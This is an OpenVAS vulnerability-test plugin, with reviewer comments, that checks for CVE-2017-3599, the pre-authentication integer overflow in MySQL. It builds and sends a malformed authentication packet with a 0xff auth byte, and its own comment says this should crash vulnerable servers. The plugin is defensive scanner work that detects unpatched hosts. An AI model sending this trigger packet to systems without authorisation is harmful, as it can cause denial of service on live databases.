  1. ###############################################################################
  2. # OpenVAS Vulnerability Test
  3. # $Id: gb_oracle_mysql_integer_overflow_vuln.nasl 72218 2017-05-04 09:14:58Z cfi $
  4. #
  5. # Oracle MySQL Server Integer Overflow Vulnerability
  6. #
  7. # Authors:
  8. # Antu Sanadi <santu@secpod.com>
  9. #
  10. # Copyright:
  11. # Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
  12. #
  13. # This program is free software; you can redistribute it and/or modify
  14. # it under the terms of the GNU General Public License version 2
  15. # (or any later version), as published by the Free Software Foundation.
  16. #
  17. # This program is distributed in the hope that it will be useful,
  18. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  19. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  20. # GNU General Public License for more details.
  21. #
  22. # You should have received a copy of the GNU General Public License
  23. # along with this program; if not, write to the Free Software
  24. # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
  25. ###############################################################################
  26.  
# Registration phase. The scanner evaluates this block once, at plugin load
# time, purely to collect metadata; the detection code further down does not
# run in this mode (exit(0) at the end of the block).
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.810773");
script_version("$Revision$");
# CVE-2017-3599 / BID 97754 -- the pre-authentication handshake-parser flaw
# described in the "insight" tag below.
script_cve_id("CVE-2017-3599");
script_bugtraq_id(97754);
# CVSSv2 7.8. Reading the vector: reachable over the network (AV:N), low
# attack complexity (AC:L), no credentials required (Au:N), no
# confidentiality or integrity impact, complete availability impact (A:C) --
# i.e. an unauthenticated remote denial of service.
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_tag(name:"last_modification", value:"$Date$");
script_tag(name:"creation_date", value:"2017-05-04 11:10:40 +0530 (Thu, 04 May 2017)");
script_name("Oracle MySQL Server Integer Overflow Vulnerability");

script_tag(name:"summary", value:"This host is installed with Oracle MySQL
Server and is prone to integer overflow vulnerability.");

# NOTE(review): "analyse the response" understates what the check does. The
# detection code sends a deliberately malformed client-authentication packet
# that its own comments say is expected to crash a vulnerable server, so this
# is an active test of the service, not a passive version comparison.
script_tag(name:"vuldetect", value:"Send the crafted request and analyse the
response to confirm the vulnerability.");

# Background for the check: the bug lives in the parsing of the client's
# handshake-response packet, i.e. before any credential is verified, which is
# why an unauthenticated attacker can reach it.
script_tag(name:"insight", value:"Upon connection from a client, the server
sends a greeting message and the client continues the communication by
starting the authentication process. The authentication packet sent by
the client contains a wealth of information including the client
capabilities, username, password, etc. The packet is received by the
server, and parsed by 'parse_client_handshake_packet()' function, in
'/sql/auth/sql_authentication.cc.'");

script_tag(name:"impact", value:"Successful exploitation will allow remote
attacker to cause a denial of service via a crafted authentication packet.

Impact Level: Application");

# Fixed in 5.6.36 / 5.7.18 (see "solution"); the detection code does not
# compare versions itself, it relies on the server's reaction to the probe.
script_tag(name:"affected", value:"Oracle MySQL version 5.6.X branch up to 5.6.35
and 5.7.X branch up to 5.7.17");

script_tag(name:"solution", value:"Upgrade to MySQL 5.6.36, 5.7.18 or later,
For updates refer to https://www.oracle.com/mysql/index.html");

# qod_type "exploit": the finding is based on actually delivering the trigger
# packet and inspecting the server's reaction, not on a banner or version.
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"exploit");
script_xref(name : "URL" , value : "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html");
script_xref(name : "URL" , value : "https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos");
script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
# ACT_ATTACK: malformed input is sent to the live service. The detection code
# records that a crash was not reproduced on the author's vulnerable test
# server, which is the stated reason for not using a denial-of-service
# category; the packet is nevertheless built to hit the overflow, so treat
# the plugin as potentially disruptive when scanning production databases.
script_category(ACT_ATTACK);
script_family("Databases");
# Only runs after mysql_version.nasl has run and the MySQL/installed key is
# present (presumably set by that dependency); the port is taken from the
# Services/mysql key, with 3306 as the fallback.
script_dependencies("mysql_version.nasl");
script_require_ports("Services/mysql", 3306);
script_mandatory_keys("MySQL/installed");
exit(0);
}
  76.  
  77. include("byte_func.inc");
  78. include("host_details.inc");
  79.  
  80. cpe_list = make_list( "cpe:/a:mysql:mysql", "cpe:/a:oracle:mysql");
  81.  
  82. set_byte_order(BYTE_ORDER_LITTLE_ENDIAN);
  83.  
  84. port = get_app_port(cpe:cpe_list);
  85. if(!port){
  86. port = 3306;
  87. }
  88.  
  89. if(!get_port_state(port)){
  90. exit(0);
  91. }
  92.  
  93. if(get_kb_item("MySQL/" + port + "/blocked")){
  94. exit(0);
  95. }
  96.  
  97. sock = open_sock_tcp(port);
  98. if(!sock){
  99. exit(0);
  100. }
  101.  
  102. res = recv( socket:sock, length:1024 );
  103. if("mysql_native_password" >!< res)
  104. {
  105. close(sock);
  106. exit(0);
  107. }
  108.  
  109. # Login request packet
  110. plen = string('\x26\x00\x00'); # 3 Bytes Packet lenth
  111. packet_num = string('\x01'); # 1 byte Packet number
  112. packet_cap = string('\x85\xa2\xbf\x01'); # client capabilities (default)
  113. packet_max = string('\x00\x00\x00\x01'); # max packet size (default)
  114. packet_cset = string('\x21'); # charset (default)
  115. p_reserved = crap(data:'\x00', length:23); # 23 bytes reserved with nulls (default)
  116. packet_usr = string('test\x00'); # username null terminated (default)
  117. packet_auth = string('\xff'); # Both \xff and \xfe should crash the server
  118. # Tested on vulnerable version crash is
  119. # not happening so script_category is ACT_ATTACK
  120. ## complete request
  121. packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth ;
  122.  
  123. ## Add packet length and number
  124. request = plen + packet_num + packet;
  125.  
  126. ## Send full request.
  127. send(socket:sock,data:request);
  128. res = recv( socket:sock, length:1024);
  129.  
  130. close(sock);
  131.  
  132. ## Patched/Fixed response is "Bad handshake'
  133. if("08S01Bad handshake" >< res){
  134. exit(0);
  135. }
  136.  
  137. ## The expected value is the password, which could be of two different formats
  138. ## (null terminated or length encoded) depending on the client functionality.
  139. if(strlen(res) > 26 && "mysql_native_password" >< res && "08S01Bad handshake" >!< res)
  140. {
  141. security_message(port:port);
  142. exit(0);
  143. }